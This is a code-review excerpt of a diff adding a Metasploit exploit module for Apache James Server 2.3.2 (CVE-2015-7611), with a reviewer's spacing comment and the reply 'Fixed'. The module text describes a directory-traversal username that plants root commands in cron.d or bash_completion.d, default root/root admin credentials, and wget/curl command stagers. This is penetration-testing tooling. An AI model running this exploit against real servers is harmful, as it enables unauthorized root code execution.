modules/exploits/linux/smtp/apache_james_exec.rb

```diff
@@ -0,0 +1,187 @@
+        validation when creating a user. Messages for a given user are stored
+        in a directory partially defined by the username. By creating a user
+        with a directory traversal payload as the username, commands can be
+        written to a given directory. To use this module with the cron
+        exploitation method, run the exploit using the given payload, host, and
+        port. After running the exploit, the payload will be executed within 60
+        seconds. Due to differences in how cron may run in certain Linux
+        operating systems such as Ubuntu, it may be preferable to set the
+        target to Bash Completion as the cron method may not work. If the target
+        is set to Bash completion, start a listener using the given payload,
+        host, and port before running the exploit. After running the exploit,
+        the payload will be executed when a user logs into the system. For this
+        exploitation method, bash completion must be enabled to gain code
+        execution. This exploitation method will leave an Apache James mail
+        object artifact in the /etc/bash_completion.d directory and the
+        malicious user account.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Palaczynski Jakub', # Discovery
+        'Matthew Aberegg',   # Metasploit
+        'Michael Burkey'     # Metasploit
+      ],
+      'References'     =>
+      [
+        [ 'CVE', '2015-7611' ],
+        [ 'EDB', '35513' ],
+        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Bash Completion', {
+          'ExploitPath' => 'bash_completion.d',
+          'ExploitPrepend' => '' } ],
+        [ 'Cron', {
+          'ExploitPath' => 'cron.d',
+          'ExploitPrepend' => '* * * * * root ' } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 1,
+      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
+          Opt::RPORT(25)
+        ])
+  end
+
+  def check
+    # SMTP service check
+    connect
+    smtp_banner = sock.get_once
+    disconnect
+    unless smtp_banner =~ /JAMES SMTP Server/
+      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
+    end
+
+    # James Remote Administration Tool service check
+    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
```

Comment:
```suggestion
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
```

Our style guide permits the spaces around `{` and `}`, although most of our code doesn't use them except for blocks. You are free to do either way, but we do want to spaces around ` => `.

Reply:
Fixed